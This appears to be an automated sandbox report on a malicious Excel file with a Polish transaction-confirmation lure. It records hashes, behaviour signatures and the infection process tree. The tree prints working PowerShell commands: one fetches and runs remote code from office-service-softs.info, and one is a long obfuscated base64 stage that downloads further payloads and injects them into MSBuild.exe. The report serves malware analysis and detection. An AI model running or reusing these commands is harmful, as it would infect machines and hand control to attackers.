2225eecf02d98cb9631cafc0c529102e14124d43b2364b8947c2b75ffc38660e

Analysis

max time kernel
130s
max time network
37s
platform
windows7_x64
resource
win7v200430
submitted
14/07/2020, 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Potwierdzenie transakcji (4).xls
Size

858KB
MD5

5a70778bed8ca69ba44a0fa43198c1cb
SHA1

3b4cd5dc12ba90d25283a14b9db45a27b7a4313f
SHA256

2225eecf02d98cb9631cafc0c529102e14124d43b2364b8947c2b75ffc38660e
SHA512

2f865ed894592311e33e6afc415871b4d1ccfdbd189fa6a9f8690d5232ef7e67864b1ad2ad25e6ebd9bc9dd176d726aa877e0311e55e6774ae5c8225650a2161

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://office-service-softs.info/tech.jpg

Signatures

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 1020 wrote to memory of 1080	1020	EXCEL.EXE	24
PID 1020 wrote to memory of 1080	1020	EXCEL.EXE	24
PID 1020 wrote to memory of 1080	1020	EXCEL.EXE	24
PID 1080 wrote to memory of 1160	1080	powershell.exe	28
PID 1080 wrote to memory of 1160	1080	powershell.exe	28
PID 1080 wrote to memory of 1160	1080	powershell.exe	28
PID 1160 wrote to memory of 1568	1160	powershell.exe	30
PID 1160 wrote to memory of 1568	1160	powershell.exe	30
PID 1160 wrote to memory of 1568	1160	powershell.exe	30
PID 1160 wrote to memory of 1568	1160	powershell.exe	30
PID 1160 wrote to memory of 1924	1160	powershell.exe	31
PID 1160 wrote to memory of 1924	1160	powershell.exe	31
PID 1160 wrote to memory of 1924	1160	powershell.exe	31
PID 1160 wrote to memory of 1924	1160	powershell.exe	31
PID 1160 wrote to memory of 1884	1160	powershell.exe	32
PID 1160 wrote to memory of 1884	1160	powershell.exe	32
PID 1160 wrote to memory of 1884	1160	powershell.exe	32
PID 1160 wrote to memory of 1884	1160	powershell.exe	32
PID 1160 wrote to memory of 1920	1160	powershell.exe	33
PID 1160 wrote to memory of 1920	1160	powershell.exe	33
PID 1160 wrote to memory of 1920	1160	powershell.exe	33
PID 1160 wrote to memory of 1920	1160	powershell.exe	33
PID 1160 wrote to memory of 1896	1160	powershell.exe	34
PID 1160 wrote to memory of 1896	1160	powershell.exe	34
PID 1160 wrote to memory of 1896	1160	powershell.exe	34
PID 1160 wrote to memory of 1896	1160	powershell.exe	34
PID 1160 wrote to memory of 1880	1160	powershell.exe	35
PID 1160 wrote to memory of 1880	1160	powershell.exe	35
PID 1160 wrote to memory of 1880	1160	powershell.exe	35
PID 1160 wrote to memory of 1880	1160	powershell.exe	35
PID 1160 wrote to memory of 1960	1160	powershell.exe	36
PID 1160 wrote to memory of 1960	1160	powershell.exe	36
PID 1160 wrote to memory of 1960	1160	powershell.exe	36
PID 1160 wrote to memory of 1960	1160	powershell.exe	36
PID 1160 wrote to memory of 2000	1160	powershell.exe	37
PID 1160 wrote to memory of 2000	1160	powershell.exe	37
PID 1160 wrote to memory of 2000	1160	powershell.exe	37
PID 1160 wrote to memory of 2000	1160	powershell.exe	37
PID 1160 wrote to memory of 1980	1160	powershell.exe	38
PID 1160 wrote to memory of 1980	1160	powershell.exe	38
PID 1160 wrote to memory of 1980	1160	powershell.exe	38
PID 1160 wrote to memory of 1980	1160	powershell.exe	38
PID 1160 wrote to memory of 1964	1160	powershell.exe	39
PID 1160 wrote to memory of 1964	1160	powershell.exe	39
PID 1160 wrote to memory of 1964	1160	powershell.exe	39
PID 1160 wrote to memory of 1964	1160	powershell.exe	39
PID 1160 wrote to memory of 1972	1160	powershell.exe	40
PID 1160 wrote to memory of 1972	1160	powershell.exe	40
PID 1160 wrote to memory of 1972	1160	powershell.exe	40
PID 1160 wrote to memory of 1972	1160	powershell.exe	40
PID 1160 wrote to memory of 1984	1160	powershell.exe	41
PID 1160 wrote to memory of 1984	1160	powershell.exe	41
PID 1160 wrote to memory of 1984	1160	powershell.exe	41
PID 1160 wrote to memory of 1984	1160	powershell.exe	41

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1080	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1020	EXCEL.EXE
1020	EXCEL.EXE

Blacklisted process makes network request 5 IoCs

flow	pid	Process
4	1080	powershell.exe
8	1160	powershell.exe
9	1160	powershell.exe
11	1160	powershell.exe
13	1160	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1020	EXCEL.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1020	EXCEL.EXE
1020	EXCEL.EXE
1020	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1080	1020	powershell.exe	23

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji (4).xls"
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://office-service-softs.info/tech.jpg')
  2⤵
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  - Process spawned unexpected child process
  PID:1080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAUABzAGIAYgBZAFYAbABiAGsALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQBzAG8AZgB0AHMALgBpAG4AZgBvAC8AcgBuAHAALgB0AHgAdAAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAFAAcwBiAGIAWQBWAGwAYgBrACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQBzAG8AZgB0AHMALgBpAG4AZgBvAC8AbQBhAGkAbgAxAC4AdAB4AHQAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAQAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABUAFMAUQBuAEIAegBJAEIAYQBlAFoAcwBIAG4ASABvAGkAUQBiAG8ATwB1AFYAbQBQAFAAcABPAEQAbwBmAGcARABEAFIATwBGAGYAQQB2AEoAYQB0AFgAZQBnAHgAdwBuAFoAaQBrAHQAcABtAG4AQwBxAEYAaABsAE0AaQBwAEoAWQBRAFYAQwB5AHoAUwBJAHEAYwBmAGUAdwB2ACkA
    3⤵
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    PID:1160
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1568
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1924
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1884
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1920
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1896
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1880
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1980
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1964
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1984

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads